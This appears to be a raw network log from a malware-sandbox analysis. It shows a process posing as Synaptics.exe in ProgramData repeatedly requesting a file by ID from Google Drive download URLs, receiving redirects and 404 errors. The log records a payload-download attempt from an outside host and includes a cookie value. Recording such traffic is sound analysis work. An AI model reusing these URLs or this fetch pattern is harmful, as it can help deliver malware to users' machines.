                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-9l9ddGzrBuXwAHyAuWgxGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:12:07 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                        2024-12-24 21:12:07 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="AT2IMeAZ-X-V7lgducL3Qw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                        2024-12-24 21:12:07 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        56 | 192.168.2.4 | 49899 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:12:06 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:07 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC43HM8bEOZiQUveYCWjJjbGzcd8pvjx8i4L2guVwCiMSAGrzavNYdou07rw7dKdfIVj7vW3PsI
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:07 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-nvGiOzTDuc_5ecr-vOND6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:12:07 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                        2024-12-24 21:12:07 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="LhqJXTE8yB8Nn_Kln_sb1A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                        2024-12-24 21:12:07 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        57 | 192.168.2.4 | 49917 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:12:09 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:10 UTC  1314  IN  HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:10 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-SDLRBOBOEFbx04jzWJaWpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                        58          192.168.2.4  49918        142.250.181.14  443               7644  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp  Bytes transferred  Direction  Data
                                                                                        2024-12-24 21:12:09 UTC  345  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:10 UTC  1314  IN  HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:10 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce--8Z1BUr6QJAmMlPOXGkakw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                        59          192.168.2.4  49927        142.250.181.14  443               7644  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp  Bytes transferred  Direction  Data
                                                                                        2024-12-24 21:12:12 UTC  345  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:13 UTC  1314  IN  HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:12 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-X0osqPpAlkgnIzeFmxrFvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                        60          192.168.2.4  49929        142.250.181.1   443               7644  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp  Bytes transferred  Direction  Data
                                                                                        2024-12-24 21:12:12 UTC  388  OUT  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                        61          192.168.2.4  49928        142.250.181.14  443               7644  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp  Bytes transferred  Direction  Data
                                                                                        2024-12-24 21:12:12 UTC  345  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:13 UTC  1314  IN  HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:12 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-eJq0LgvZtHNChAS8SqFoMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                        62          192.168.2.4  49926        142.250.181.1   443               7644  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp  Bytes transferred  Direction  Data
                                                                                        2024-12-24 21:12:12 UTC  388  OUT  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                        63          192.168.2.4  49941        142.250.181.1   443               7644  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp  Bytes transferred  Direction  Data
                                                                                        2024-12-24 21:12:15 UTC  388  OUT  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:16 UTC  1243  IN  HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC66x_MxidOmmNANaz9iYvtr0igAuuex2lwF4JMkbTu94-5hRid4vrbCl1wRLk4KmvRn
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:16 GMT
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-z-hLb-I4gArl8Y4iv00V_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:12:16 UTC  147  IN
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                        2024-12-24 21:12:16 UTC  1390  IN
                                                                                        Data Ascii: t Found)!!1</title><style nonce="lmIeXSMMx588Dqh-qA0TNQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                        2024-12-24 21:12:16 UTC  115  IN
                                                                                        Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                        64          192.168.2.4  49942        142.250.181.1   443               7644  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp  Bytes transferred  Direction  Data
                                                                                        2024-12-24 21:12:15 UTC  388  OUT  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:16 UTC  1250  IN  HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC7v5oCN09FNRVxhjUA_E3jyzlK8yNjGyzckvBgYexjigbDxpvA1vfBAyT27UgQtZ_w7Hp03Pp8
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:15 GMT
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-kzxPUoPJWQ3bRNi8l_H09Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:12:16 UTC  140  IN
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                        2024-12-24 21:12:16 UTC  1390  IN
                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="1FaLzPAMv4R6sXtnwRazLg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                        2024-12-24 21:12:16 UTC | 122 | IN
                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        65 | 192.168.2.4 | 49944 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:12:15 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:16 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:15 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-dohjq_-Md1YHm5k9bfW5OQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        66 | 192.168.2.4 | 49943 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:12:15 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:16 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:15 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-bOJ-SqtlRolhRvrpRBUaGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Target ID:0
